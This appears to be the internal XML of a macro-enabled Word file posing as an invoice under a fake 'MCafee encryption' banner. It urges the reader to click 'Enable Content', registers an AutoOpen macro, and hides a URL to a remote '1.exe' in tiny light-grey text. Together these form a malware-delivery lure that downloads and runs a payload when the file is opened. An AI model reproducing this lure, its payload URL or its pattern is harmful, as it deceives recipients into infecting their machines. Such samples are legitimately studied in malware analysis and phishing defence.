
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>
  <Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+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4C3" w:rsidRDefault="006F14C3" w:rsidP="006F14C3">
      <w:pPr>
        <w:pStyle w:val="Title"/>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-704850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1133475" cy="685800"/>
                <wp:effectExtent l="0" t="19050" r="47625" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Bent-Up Arrow 3"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1133475" cy="685800"/>
                        </a:xfrm>
                        <a:prstGeom prst="bentUpArrow">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 25000"/>
                            <a:gd name="adj2" fmla="val 23765"/>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B0C71" id="Bent-Up Arrow 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:12.75pt;margin-top:-55.5pt;width:89.2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3475,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" path="m,514350r884770,l884770,171450r-77256,l970495,r162980,171450l1056220,171450r,514350l,685800,,514350xe" fillcolor="#4f81bd [3204]" strokecolor="#243f60 [1604]" strokeweight="2pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,514350;884770,514350;884770,171450;807514,171450;970495,0;1133475,171450;1056220,171450;1056220,685800;0,685800;0,514350" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F14C3" w:rsidRDefault="006F14C3" w:rsidP="006F14C3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Invoice #02122016az</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F14C3" w:rsidRDefault="006F14C3" w:rsidP="006F14C3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MCafee encryption – business edition.For Microsoft Office ONLY!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F14C3" w:rsidRDefault="006F14C3" w:rsidP="006F14C3">
      <w:r>
        <w:t xml:space="preserve">To get started right away, please click “Enable Content” Like in the example below! You will see it at the top of the page! Were the orange arrow is pointing to view the invoice. We use MacAfee encryption to protect clients &amp; our business </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F14C3" w:rsidRDefault="006F14C3" w:rsidP="006F14C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1"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rsidR="00F96B03" w:rsidRPr="00357D88" w:rsidRDefault="00F96B03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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357D88" w:rsidRDefault="00D85293">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D85293" w:rsidRPr="000169F7" w:rsidRDefault="000169F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>http://firb.br/firb//plugins/editors/invoices/1.exe\</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D85293" w:rsidRPr="000169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DE"/>
    <w:rsid w:val="00007E3D"/>
    <w:rsid w:val="000169F7"/>
    <w:rsid w:val="00055732"/>
    <w:rsid w:val="000569C1"/>
    <w:rsid w:val="000B1EAF"/>
    <w:rsid w:val="00102CE9"/>
    <w:rsid w:val="001064CE"/>
    <w:rsid w:val="001758CA"/>
    <w:rsid w:val="001859D7"/>
    <w:rsid w:val="00213094"/>
    <w:rsid w:val="002A689B"/>
    <w:rsid w:val="002E3970"/>
    <w:rsid w:val="00322C80"/>
    <w:rsid w:val="00355CEF"/>
    <w:rsid w:val="00357D88"/>
    <w:rsid w:val="003C14A3"/>
    <w:rsid w:val="003D4175"/>
    <w:rsid w:val="003D4E4C"/>
    <w:rsid w:val="003E0812"/>
    <w:rsid w:val="00400433"/>
    <w:rsid w:val="00401AA9"/>
    <w:rsid w:val="004125C7"/>
    <w:rsid w:val="00423581"/>
    <w:rsid w:val="004C1586"/>
    <w:rsid w:val="004C5421"/>
    <w:rsid w:val="005411F3"/>
    <w:rsid w:val="005A4499"/>
    <w:rsid w:val="00610ECB"/>
    <w:rsid w:val="006117C5"/>
    <w:rsid w:val="00617DDC"/>
    <w:rsid w:val="006D6EB6"/>
    <w:rsid w:val="006E0CC5"/>
    <w:rsid w:val="006E56FA"/>
    <w:rsid w:val="006F14C3"/>
    <w:rsid w:val="007C2BCD"/>
    <w:rsid w:val="00864FBB"/>
    <w:rsid w:val="008742AD"/>
    <w:rsid w:val="00874B96"/>
    <w:rsid w:val="00877FF0"/>
    <w:rsid w:val="00895367"/>
    <w:rsid w:val="009210E2"/>
    <w:rsid w:val="00973140"/>
    <w:rsid w:val="00981292"/>
    <w:rsid w:val="00A01528"/>
    <w:rsid w:val="00A66539"/>
    <w:rsid w:val="00AB08DE"/>
    <w:rsid w:val="00AF3821"/>
    <w:rsid w:val="00BB3BFC"/>
    <w:rsid w:val="00BC6BA3"/>
    <w:rsid w:val="00C055C8"/>
    <w:rsid w:val="00C545B6"/>
    <w:rsid w:val="00CA154B"/>
    <w:rsid w:val="00CB1B6E"/>
    <w:rsid w:val="00CC2C0D"/>
    <w:rsid w:val="00D23FBB"/>
    <w:rsid w:val="00D45AF6"/>
    <w:rsid w:val="00D85293"/>
    <w:rsid w:val="00E5454C"/>
    <w:rsid w:val="00E6267D"/>
    <w:rsid w:val="00E64850"/>
    <w:rsid w:val="00ED25FE"/>
    <w:rsid w:val="00F571DA"/>
    <w:rsid w:val="00F84440"/>
    <w:rsid w:val="00F96B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7458C5-B515-4A62-87FA-2E874723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6F14C3"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="17365D" w:themeColor="text2" w:themeShade="BF"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="17365D" w:themeColor="text2" w:themeShade="BF"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>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C3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="15"/>
      <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="006F14C3"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="264" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="006F14C3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="17365D" w:themeColor="text2" w:themeShade="BF"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>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mcds>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.AUTOOPEN" wne:name="Project.ThisDocument.AutoOpen"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4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Anna;AnnaS;Fortek</dc:creator>
  <cp:lastModifiedBy>Lab13</cp:lastModifiedBy>
  <cp:revision>111</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-01T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-06T20:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>